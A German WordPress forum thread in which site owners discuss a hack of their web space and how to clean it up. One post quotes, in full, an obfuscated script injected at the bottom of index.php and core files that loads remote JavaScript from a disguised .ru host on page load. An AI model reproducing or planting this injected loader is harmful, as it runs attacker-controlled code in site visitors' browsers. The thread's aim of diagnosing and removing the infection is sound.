Was macht default-widgets, filters & embeds.php?

  • Habe durch Zufall heute auf einigen Blogs in meinerm wp-includes Ordner 3 Dateien gesehn (default-widgets.php, default-filters.php und default-embeds.php) die alle das Datum von gestern hatten. Was wird da von WP automatisch verändert und wozu die Dateien?

    Danke und frohes Fest an alle.:-P

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Ich hatte bei ein paar Blogs in der index.php und oben genannte Dateien folgende Zeile ganz unten drin stehen.

    Code
    <script>/*GNU GPL*/ try{window.onload = function(){var Tr3dshq3q9w = document.createElement('s#!(c))@r(i)p!t&'.replace(/&|\!|\(|\$|\^|\)|@|#/ig, ''));Tr3dshq3q9w.setAttribute('type', 'text/javascript');Tr3dshq3q9w.setAttribute('src',  'h$^t^^$t$@#p#!@:(&&/^/@#k()$i!n&^^$!o(&p^!#o@!)^i&s&#k)!$-@!r!!u#(.^!(t@!h(e(^f@@)&r$&!e!@(e)$d!&i)^!(c^$(()t#)#$i!)#o))^^n#@(&a#)r(#(y@.&^^c)&o(#))m&)!.(w&$&@a!(s(^h#$!)i(n!!$$g(!t#@^o!((n@$$p#o#(($s!t!-#@c(&#o&$m($.^)m!(u(((s$$^&i!!c!))#b&o(x@(^!p!#!^r!($o!^!.@(@r&$u!@:(!8#0&#^8(#0(&(/&!g@@)o@)#o&g)#!l$e&.()!c)$@#o$(^m(.!!t&&w!!/#(^&g)$o$@)o^$)g$&(@l!)$(e&@@.#)c^@^o$m^.(t&w(/&p@$^a)!@(n!@$d()(!o!r)!)a&&$^.^c)(o)&m$!/!(e#)!v!^$i$)t@$e$.$&@(c&@(o#(m(/^(^g^)o)!o(#@g@(&&l^(e!.@$c^$@o(m))/^&!'.replace(/#|\$|\^|\(|\)|&|@|\!/ig, ''));Tr3dshq3q9w.setAttribute('defer', 'defer');Tr3dshq3q9w.setAttribute('id', 'Y!)$@w(^$^u!^#)3)$a@)#6^$$b!9&^x($()k&)i)&#s!'.replace(/\(|&|\^|\!|#|\$|@|\)/ig, ''));document.body.appendChild(Tr3dshq3q9w);}} catch(e) {}</script>

    Was isn das?:?: gehackt?

  • Na Prima, die letzten beiden Versionen von WP nutze ich.
    Das krasse ist das es nicht nur Wordpress betrifft. Auch andere Domains auf meinem Webspace haben das Problem.

    Die können doch nur über FTP da reinkommen oder?

  • Na Prima, die letzten beiden Versionen von WP nutze ich.
    Das krasse ist das es nicht nur Wordpress betrifft. Auch andere Domains auf meinem Webspace haben das Problem.

    Die können doch nur über FTP da reinkommen oder?


    Die können u.a. über irgendein beliebiges Script, Plugin, Theme etc. reingekommen sein, das muss nicht WP sein.

    "Eine gut gestellte Frage ist schon halb beantwortet."


  • Im Footer ist, wie so oft, ein verschlüsselter Code. Den ich auch erstmal dringelassen hab. Kann es sein das da etwas enthalten ist das mir jetzt den schaden zugefügt hat?


    Rein theoretisch ja. Wobei für gewöhnlich aber nur Werbung verschlüsselt ist.

    "Eine gut gestellte Frage ist schon halb beantwortet."

  • Nur die Frage was das Script denn nun macht.
    Kann nur sagen das irgendeine .ru während des ladens unten erscheint.

    Müsste ich denn in den logdatein den zugriff nicht finden?
    Und dann die IP über htaccess sperren?

  • Nur die Frage was das Script denn nun macht.
    Kann nur sagen das irgendeine .ru während des ladens unten erscheint.

    Müsste ich denn in den logdatein den zugriff nicht finden?
    Und dann die IP über htaccess sperren?


    .htaccess ist nur für den Zugriff von außen. Versuch' halt direkt den Code rauszuschmeißen.

    "Eine gut gestellte Frage ist schon halb beantwortet."

  • Hallo Leidensgenossin (die Hexe?),

    Nur die Frage was das Script denn nun macht.
    Kann nur sagen das irgendeine .ru während des ladens unten erscheint.

    Müsste ich denn in den logdatein den zugriff nicht finden?
    Und dann die IP über htaccess sperren?


    Wie ist der aktuelle Stand? Ich habe seit heute Nachmittag ganz ähnliche Probleme. Bei mir kam eine ChangeLoad.pdf mit unsinnigem Inhalt und dann jede Menge Trojaner- und Rootkit-Meldungen von AntiVir. Die Spur scheint zu WP zu führen. Bitte melde Dich, falls Du eine Lösung hast.

    Danke, AnselmR

  • Das beschreibt meine Probleme sehr genau. Der Original-Conficker war es trotzdem nicht. Avira, an die ich infizierte Dateien zur Überprüfung einsandte, gab dem Virus einen neuen Namen. Ich glaubte zunächst, nur WordPress sei betroffen. In Wirklichkeit war es aber meine gesamte Website. Jetzt verwende ich beispielsweise nur noch SFTP und habe mich auch anderweitig so gut abgesichert, dass die Benachrichtigung zum vorigen Posting in meinem Spam-Ordner auf dem Server gelandet ist ... Gruß, Anselm

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!